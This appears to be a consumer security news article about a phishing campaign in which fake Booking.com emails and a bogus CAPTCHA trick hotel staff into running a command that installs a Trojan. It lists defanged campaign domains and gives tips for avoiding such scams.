Hotel staff who think they’re confirming a reservation might be booking themselves a front-row seat to a cyberattack instead.
It starts with a few emails. Nothing unusual – just routine booking confirmations from what looks like Booking.com. The hotel staff, used to the daily flood of reservations, might click it without a second thought.
Then comes the CAPTCHA screen. “Prove you’re human,” it says. What if they do so? Just like that, they might end up giving hackers access to their own systems.
Cybersecurity firm Malware Bytes has just identified a fresh phishing campaign targeting the hospitality industry. And hotels are a goldmine for cybercriminals.
Once inside, hackers can steal booking details, payment information, and even personal guest data – names, emails, credit card numbers, and possibly worse.
Access to one compromised network could mean attackers selling thousands of guest details on the dark web or even deploying ransomware to lock down the entire booking system until a ransom is paid.
How does the phishing scam work?
The scam starts with an email that looks exactly like it’s from Booking.com, asking hotels to confirm a guest’s reservation.
Clicking the link takes the victim to a near-perfect replica of a Booking.com login page – except there’s a “prove you’re human” CAPTCHA that pops up immediately. Seems normal, right? However, that’s the trap.
CAPTCHA doesn’t verify them – it’s used to copy a malicious command into the victim's clipboard. Victims are instructed to paste and run a malicious command in Windows, which executes a remote script, installing a Trojan onto the hotel’s system.
Letting in Trojan malware is dreadful, as it is basically the same as handing the entire hotel system into the hands of the attacker.
What malicious URLs are used by the scam?
- vencys[.]com – Used in the fake Booking.com emails.
- bokcentrpart[.]com – Hosts the CAPTCHA trap that delivers the malicious code.
- captpart[.]info – The final payload where the Trojan is downloaded.
Booking.com is often used for phishing scams
Scammers have long viewed Booking.com as a prime target for their schemes. Reddit users, often the first to uncover new scams, have been buzzing with posts about how Booking.com phishing attacks are becoming almost routine.
“I keep getting verification link emails from Booking.com in my work email, but I have never signed in/signed up for it,” wrote one Reddit user, whose email might have been leaked and targeted by the scammers.
Another Reddit user shared about the perfectly executed phishing scam they almost fell for. They received an email from what looked like “[email protected],” complete with all their reservation details.
It claimed they needed to enter their credit card info through a link to “validate” the booking. The email was clear: “Fail to provide your card details, and you’ll lose your reservation.”
In a panic, they entered their information, thinking they were just confirming a payment. The email even promised that the charge would be refunded “in a few seconds.” But nothing happened.
Soon after, they noticed a second charge attempt on their card. Lucky for them, they caught it before it went through, but it was a close call.
How to avoid phishing scams?
- Never trust urgent emails. If Booking.com really needs you to confirm something, log into the site manually.
- Check the email sender’s domain. If it’s not booking.com, it’s probably scammers.
- Don’t click suspicious links. If a link in an email is telling you to verify something, it’s probably a scam.
- NEVER run copied commands in Windows unless you know what they do. If someone is telling you to paste code into a command prompt, they’re probably hacking you.
- Use security training for hotel staff. Teach employees to recognize social engineering attacks before they happen.
Your email address will not be published. Required fields are markedmarked